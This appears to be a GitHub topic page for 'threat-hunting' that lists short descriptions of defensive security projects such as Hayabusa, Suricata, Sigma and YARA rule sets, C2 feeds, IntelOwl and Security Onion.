Repository intended to allow users to leverage site fingerprints within their environments for threat detection and threat hunting
-
Updated
Jun 3, 2024
Repository intended to allow users to leverage site fingerprints within their environments for threat detection and threat hunting
Automatically created C2 Feeds
Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine developed by the OISF and the Suricata community.
Set of SIGMA rules (>320) mapped to MITRE ATT&CK tactic and techniques
🔍🔍 Malware scanner for cloud-native, as part of CI/CD and at Runtime 🔍🔍
Live Feed of C2 servers, tools, and botnets
IntelOwl: manage your Threat Intelligence at scale
Clusters and elements to attach to MISP events or attributes (like threat actors)
Cover various security approaches to attack techniques and also provides new discoveries about security breaches.
Harness the power of Splunk for your investigations
Threat Hunting Toolkit is a Swiss Army knife for threat hunting, log processing, and security-focused data science
Threat Hunting queries for various attacks
Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, and case management. It also includes other tools such as Playbook, osquery, CyberChef, Elasticsearch, Logstash, Kibana, Suricata, and Zeek.
Anvilogic Forge
Awesome list of keywords and artifacts for Threat Hunting sessions
yara detection rules for hunting with the threathunting-keywords project
Sigma detection rules for hunting with the threathunting-keywords project
This project consists of an open source library allowing software to connect to data repositories using STIX Patterning, and return results as STIX Observations.
Scirius is a web application for Suricata ruleset management and threat hunting.
Add a description, image, and links to the threat-hunting topic page so that developers can more easily learn about it.
To associate your repository with the threat-hunting topic, visit your repo's landing page and select "manage topics."